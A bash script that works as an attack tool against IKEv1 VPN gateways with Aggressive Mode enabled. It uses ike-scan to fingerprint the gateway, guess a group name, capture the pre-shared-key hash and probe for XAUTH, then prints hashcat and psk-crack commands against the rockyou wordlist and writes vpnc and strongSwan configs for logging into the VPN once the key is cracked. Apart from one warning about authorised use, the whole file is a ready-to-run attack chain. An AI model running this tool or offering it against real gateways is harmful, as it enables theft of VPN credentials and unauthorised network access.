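#!/bin/bash
#
# IKE PSK Hash Capture Tool
# Captures Pre-Shared Key hashes from IKEv1 VPNs with Aggressive Mode enabled
#
# Usage: ./ike_psk_capture.sh <target_ip> [group_name] [output_dir]
#
# Run this only against systems you are explicitly authorised to test: every
# step sends IKE handshakes to the target and will appear in its logs.
#
# The capture file holds HASH_R plus the nonces/cookies needed to brute-force
# the PSK offline, and the generated configs are meant to receive the cracked
# PSK later, so everything written under OUTPUT_DIR is created 0600/0700.
#
# NOTE: deliberately no `set -e` -- each ike-scan step is judged on its output
# text, not its exit status, and ike-scan exits 0 even when nothing answers.
set -o pipefail
umask 077

RED='\033[0;31m'
GREEN='\033[0;92m'
YELLOW='\033[0;93m'
CYAN='\033[0;96m'
NC='\033[0m' # No Color

# ike-scan binds UDP source port 500 by default (privileged), so root is required.
if [ "$EUID" -ne 0 ]; then
  echo -e "${RED}[!] This script must be run as root${NC}"
  exit 1
fi
if ! command -v ike-scan &> /dev/null; then
  echo -e "${RED}[!] ike-scan not found. Install with: sudo apt install ike-scan${NC}"
  exit 1
fi

TARGET="${1:-}"
GROUP="${2:-GroupVPN}"                 # common default group name on SonicWall gateways
OUTPUT_DIR="${3:-/tmp/psk_captures}"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

if [ -z "$TARGET" ]; then
  echo "Usage: $0 <target_ip> [group_name] [output_dir]"
  echo ""
  echo "Examples:"
  echo " $0 192.168.1.1"
  echo " $0 192.168.1.1 GroupVPN"
  echo " $0 192.168.1.1 'WAN GroupVPN' /tmp/hashes"
  exit 1
fi

# The default output directory lives under world-writable /tmp and we run as
# root: refuse a pre-planted symlink or a directory owned by another local
# user, otherwise our hash and config writes could be redirected or read.
# (The check-then-mkdir is still a small TOCTOU window; pass a private
# output_dir when the host is shared.)
if [ -L "$OUTPUT_DIR" ]; then
  echo -e "${RED}[!] $OUTPUT_DIR is a symlink - refusing to write there${NC}"
  exit 1
fi
if ! mkdir -p "$OUTPUT_DIR"; then
  echo -e "${RED}[!] Could not create $OUTPUT_DIR${NC}"
  exit 1
fi
if [ ! -O "$OUTPUT_DIR" ]; then
  echo -e "${RED}[!] $OUTPUT_DIR exists but is not owned by us - refusing to write there${NC}"
  exit 1
fi
chmod 700 "$OUTPUT_DIR"

echo ""
echo "╔═══════════════════════════════════════════════════════════════╗"
echo "║ IKE PSK Hash Capture Tool ║"
echo "╚═══════════════════════════════════════════════════════════════╝"
echo ""
echo -e "Target: ${GREEN}$TARGET${NC}"
echo -e "Group: ${GREEN}$GROUP${NC}"
echo -e "Output: ${GREEN}$OUTPUT_DIR${NC}"
echo ""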
# Step 1: Confirm the target speaks IKEv1 at all (Main Mode, ike-scan's default proposals)
echo "[*] Step 1: Checking IKE service..."
MAIN_MODE=$(ike-scan -M "$TARGET" 2>&1)
if ! grep -q "Main Mode Handshake returned" <<<"$MAIN_MODE"; then
  echo -e "${RED}[!] Target does not respond to IKEv1${NC}"
  echo "$MAIN_MODE"
  exit 1
fi
echo -e "${GREEN}[+] IKEv1 Main Mode is responding${NC}"
# Vendor: the parenthesised name after "VID=..." is ike-scan's own lookup of
# the vendor-ID fingerprint, not free text from the target.
VENDOR=$(grep -oP 'VID=\S+ \(\K[^)]+' <<<"$MAIN_MODE" | head -1)
[ -n "$VENDOR" ] && echo -e " Vendor: ${YELLOW}$VENDOR${NC}"
# Transform the responder selected, e.g. "Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK ..."
TRANSFORM=$(grep -oP 'SA=\(\K[^)]+' <<<"$MAIN_MODE")
[ -n "$TRANSFORM" ] && echo -e " Transform: ${YELLOW}$TRANSFORM${NC}"
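# Step 2: Check IKEv2 (informational only)
echo ""
echo "[*] Step 2: Checking IKEv2..."
IKEV2=$(ike-scan --ikev2 -M "$TARGET" 2>&1)
if echo "$IKEV2" | grep -q "SA="; then
  echo -e "${YELLOW}[!] IKEv2 is also supported (more secure, no hash exposure)${NC}"
else
  # One unanswered probe with ike-scan's default IKEv2 proposal is only a hint:
  # the gateway may accept other IKEv2 proposals or be rate-limiting. Whether
  # the PSK hash is actually exposed is decided by the Aggressive Mode test
  # below, so no "vulnerable" verdict is given here.
  echo -e "${GREEN}[+] IKEv2 not detected with the default proposal - testing IKEv1 Aggressive Mode next${NC}"
fi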
# Step 3: Aggressive Mode handshake with the supplied group as our IDii
echo ""
echo "[*] Step 3: Testing Aggressive Mode with group '$GROUP'..."
AGG_RESULT=$(ike-scan -M -A --id="$GROUP" "$TARGET" 2>&1)
if ! grep -q "Aggressive Mode Handshake returned" <<<"$AGG_RESULT"; then
  echo -e "${RED}[!] Group '$GROUP' not accepted${NC}"
  echo " Try common groups: GroupVPN, vpn, VPN, default, remote, users"
  exit 1
fi
# "Accepted" here only means a handshake came back; some gateways answer
# Aggressive Mode for any ID, so this does not prove the group name is valid.
echo -e "${GREEN}[+] Aggressive Mode accepted group: $GROUP${NC}"
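# Step 4: Capture PSK hash
echo ""
echo "[*] Step 4: Capturing PSK hash..."
# Spaces in the group name are replaced so the path stays shell-friendly.
PSK_FILE="$OUTPUT_DIR/psk_${TARGET}_${GROUP// /_}_${TIMESTAMP}"
HASHCAT_FILE="${PSK_FILE}.hashcat"
# -P<file> makes ike-scan write the psk-crack record, nine colon-separated hex fields:
#   g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
# Keep ike-scan's own output so a failure (e.g. the file could not be opened)
# can be shown instead of a bare "failed".
CAPTURE_OUT=$(ike-scan -M -A --id="$GROUP" -P"$PSK_FILE" "$TARGET" 2>&1)
# -s rather than -f: an empty file means ike-scan created it but got no hash back.
if [ ! -s "$PSK_FILE" ]; then
  echo -e "${RED}[!] Failed to capture PSK hash${NC}"
  echo "$CAPTURE_OUT"
  exit 1
fi
HASH_DATA=$(cat "$PSK_FILE")
FIELD_COUNT=$(awk -F: '{print NF; exit}' <<<"$HASH_DATA")
if [ "$FIELD_COUNT" -ne 9 ]; then
  echo -e "${RED}[!] Unexpected record format in $PSK_FILE ($FIELD_COUNT fields, expected 9)${NC}"
  exit 1
fi
HASH_R=$(awk -F: '{print $NF; exit}' <<<"$HASH_DATA")
# The hash algorithm is whatever the gateway negotiated, not necessarily SHA1:
# ike-scan's default proposal set offers both SHA1 and MD5. hash_r is 20 bytes
# (40 hex chars) for SHA1 and 16 bytes (32 hex chars) for MD5, and hashcat
# uses different modes for them: 5400 = IKE-PSK SHA1, 5300 = IKE-PSK MD5.
case "${#HASH_R}" in
  40)
    HASH_ALG="SHA1"
    HASHCAT_MODE=5400
    ;;
  32)
    HASH_ALG="MD5"
    HASHCAT_MODE=5300
    ;;
  *)
    HASH_ALG="unknown"
    HASHCAT_MODE=5400
    echo -e "${YELLOW}[!] hash_r is ${#HASH_R} hex chars - neither SHA1 (40) nor MD5 (32); inspect $PSK_FILE before cracking${NC}"
    ;;
esac
echo -e "${GREEN}[+] PSK hash captured!${NC}"
echo -e " Hash ($HASH_ALG): ${YELLOW}$HASH_R${NC}"
echo -e " Raw file: ${GREEN}$PSK_FILE${NC}"
# hashcat modes 5300/5400 consume the psk-crack record unchanged.
cp "$PSK_FILE" "$HASHCAT_FILE"
echo -e " Hashcat file: ${GREEN}$HASHCAT_FILE${NC}"

# Field 6 (idir_b) is the responder's ID payload body: 1 byte ID type, 1 byte
# protocol ID, 2 bytes port (RFC 2407 4.6.2), then the identification data,
# hence the 8-hex-char skip. Only text-bearing ID types are decoded:
# 02 = ID_FQDN, 03 = ID_USER_FQDN, 0b = ID_KEY_ID.
IDIR_B=$(awk -F: '{print $6; exit}' <<<"$HASH_DATA")
VPN_ID=""
if [[ "$IDIR_B" =~ ^(02|03|0[bB])[0-9a-fA-F]{6} ]]; then
  HEX_ID="${IDIR_B:8}"
  # These bytes come from the target: drop anything non-printable so a hostile
  # gateway cannot push terminal escape sequences into our output, and print
  # with %s rather than echo -e so nothing in them is re-interpreted.
  VPN_ID=$(xxd -r -p <<<"$HEX_ID" 2>/dev/null | tr -cd '[:print:]')
  if [ -n "$VPN_ID" ]; then
    printf '%b%s%b\n' " VPN Identity: ${YELLOW}" "$VPN_ID" "$NC"
  fi
fi

# Step 5: Quick MFA check
echo ""
echo "[*] Step 5: Checking for MFA (XAUTH)..."
# ike-scan --trans takes enc[/keylen],hash,auth,group. Auth 65001 is
# XAUTHInitPreShared (draft-ietf-ipsec-isakmp-xauth) and belongs in the third
# slot; the earlier "5,2,1,65001" put it in the DH-group slot, matched no
# gateway policy, and therefore always reported "NO MFA" (a false negative).
# A gateway only answers a proposal it is configured for, so a handful of
# common ones are probed; an XAUTH policy on some other transform would still
# be missed, which the result text makes explicit. Each probe takes a few
# seconds when unanswered.
XAUTH_TRANSFORMS=("5,2,65001,2" "5,1,65001,2" "7/128,2,65001,2" "7/256,2,65001,2" "7/128,2,65001,14")
MFA_DETECTED=false
XAUTH_HIT=""
for XAUTH_TRANS in "${XAUTH_TRANSFORMS[@]}"; do
  XAUTH_RESULT=$(ike-scan -M --trans="$XAUTH_TRANS" "$TARGET" 2>&1)
  if grep -q "Main Mode Handshake returned" <<<"$XAUTH_RESULT"; then
    MFA_DETECTED=true
    XAUTH_HIT="$XAUTH_TRANS"
    break
  fi
done
if [ "$MFA_DETECTED" = true ]; then
  echo -e "${YELLOW}[!] XAUTH PSK accepted (transform $XAUTH_HIT) - MFA may be configured${NC}"
  echo " Note: PSK hash is still captured BEFORE MFA prompt"
else
  echo -e "${GREEN}[+] XAUTH not accepted on the probed transforms - no MFA detected on this policy${NC}"
fi

# Step 6: Cracking instructions
echo ""
echo "═══════════════════════════════════════════════════════════════════════════"
echo -e "${GREEN}[+] SUCCESS - Hash ready for cracking${NC}"
echo "═══════════════════════════════════════════════════════════════════════════"
echo ""
echo -e "${CYAN}STEP 1: CRACK THE HASH${NC}"
echo "─────────────────────────────────────────────────────────────────────────────"
echo ""
echo " Using hashcat (GPU - fastest; mode $HASHCAT_MODE = IKE-PSK $HASH_ALG):"
echo -e " ${YELLOW}hashcat -m $HASHCAT_MODE $HASHCAT_FILE /usr/share/wordlists/rockyou.txt${NC}"
echo ""
echo " Using hashcat with rules:"
echo -e " ${YELLOW}hashcat -m $HASHCAT_MODE $HASHCAT_FILE /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule${NC}"
echo ""
echo " Using psk-crack (CPU):"
echo -e " ${YELLOW}psk-crack -d /usr/share/wordlists/rockyou.txt $PSK_FILE${NC}"
echo ""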
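# Generate connection configs.
# Both files are placeholders until CRACKED_PASSWORD is filled in, after which
# they hold a live VPN credential: create them 0600 and remove them when the
# engagement ends. TARGET and GROUP are operator-supplied and are interpolated
# verbatim into the heredocs.
umask 077

# vpnc config
VPNC_CONF="$OUTPUT_DIR/vpnc_${TARGET}_${GROUP// /_}.conf"
cat > "$VPNC_CONF" << EOF
# VPNC Configuration for $TARGET
# Generated by ike_psk_capture.sh
# Replace CRACKED_PASSWORD with the actual cracked PSK
IPSec gateway $TARGET
IPSec ID $GROUP
IPSec secret CRACKED_PASSWORD
# Xauth username YOUR_USERNAME
# Xauth password YOUR_PASSWORD
EOF

# strongSwan/ipsec config. The conn name is arbitrary; it must match the
# "ipsec up/down" commands printed below.
IPSEC_CONF="$OUTPUT_DIR/ipsec_${TARGET}_${GROUP// /_}.conf"
cat > "$IPSEC_CONF" << EOF
# strongSwan/IPsec Configuration for $TARGET
# Generated by ike_psk_capture.sh
# Replace CRACKED_PASSWORD with the actual cracked PSK
# The ike=/esp= proposals below are a common default and may not be what the
# gateway accepts; adjust them to the Enc/Hash/Group printed in Step 1.
conn walsh-vpn
keyexchange=ikev1
left=%defaultroute
leftid=$GROUP
right=$TARGET
rightid=%any
authby=psk
ike=3des-sha1-modp1024!
esp=3des-sha1!
aggressive=yes
auto=add
# Add to /etc/ipsec.secrets:
# $TARGET : PSK "CRACKED_PASSWORD"
EOF
chmod 600 "$VPNC_CONF" "$IPSEC_CONF"

echo -e "${CYAN}STEP 2: CONNECT TO VPN (after cracking)${NC}"
echo "─────────────────────────────────────────────────────────────────────────────"
echo ""
echo -e " ${GREEN}Option A: Using vpnc (easiest)${NC}"
echo ""
echo " 1. Install vpnc:"
echo -e " ${YELLOW}sudo apt install vpnc${NC}"
echo ""
echo " 2. Edit the config with cracked password:"
echo -e " ${YELLOW}sudo nano $VPNC_CONF${NC}"
echo ""
echo " 3. Connect:"
echo -e " ${YELLOW}sudo vpnc $VPNC_CONF${NC}"
echo ""
echo " 4. Disconnect:"
echo -e " ${YELLOW}sudo vpnc-disconnect${NC}"
echo ""
echo " ─────────────────────────────────────────────────────────────────────────"
echo ""
echo -e " ${GREEN}Option B: Using strongSwan/ipsec${NC}"
echo ""
# Copying over /etc/ipsec.conf replaces whatever strongSwan config the host
# already has, so the printed command takes a backup first.
echo " 1. Copy config (this REPLACES any existing /etc/ipsec.conf - a backup is taken first):"
echo -e " ${YELLOW}sudo cp /etc/ipsec.conf /etc/ipsec.conf.bak 2>/dev/null; sudo cp $IPSEC_CONF /etc/ipsec.conf${NC}"
echo ""
echo " 2. Add secret to /etc/ipsec.secrets:"
echo -e " ${YELLOW}echo '$TARGET : PSK \"CRACKED_PASSWORD\"' | sudo tee -a /etc/ipsec.secrets${NC}"
echo ""
echo " 3. Restart and connect:"
echo -e " ${YELLOW}sudo ipsec restart && sudo ipsec up walsh-vpn${NC}"
echo ""
echo " 4. Disconnect:"
echo -e " ${YELLOW}sudo ipsec down walsh-vpn${NC}"
echo ""
echo " ─────────────────────────────────────────────────────────────────────────"
echo ""
echo -e " ${GREEN}Option C: One-liner with ike-scan (test only)${NC}"
echo ""
echo " Verify cracked password works:"
echo -e " ${YELLOW}sudo ike-scan -M -A --id=\"$GROUP\" --pskcrack=\"CRACKED_PASSWORD\" $TARGET${NC}"
echo ""
# MFA_DETECTED is set by the XAUTH probe in Step 5.
if [ "$MFA_DETECTED" = true ]; then
  echo " ─────────────────────────────────────────────────────────────────────────"
  echo ""
  echo -e " ${YELLOW}⚠ WARNING: MFA (XAUTH) detected!${NC}"
  echo ""
  echo " You will need username/password for XAUTH after PSK auth."
  echo " Edit vpnc config to add:"
  echo " Xauth username YOUR_USERNAME"
  echo " Xauth password YOUR_PASSWORD"
  echo " The generated strongSwan conn has no XAUTH client settings; it will"
  echo " likely need leftauth=psk / leftauth2=xauth / xauth_identity plus an"
  echo " XAUTH line in ipsec.secrets - check the strongSwan docs for your version."
  echo ""
fi
echo "═══════════════════════════════════════════════════════════════════════════"
echo ""
echo -e "${GREEN}Generated config files:${NC}"
echo -e " VPNC config: ${YELLOW}$VPNC_CONF${NC}"
echo -e " strongSwan config: ${YELLOW}$IPSEC_CONF${NC}"
echo ""
echo " Once CRACKED_PASSWORD is filled in these files contain a live credential;"
echo " they are created 0600 - delete them when the engagement is over."
echo ""
echo "[*] Done."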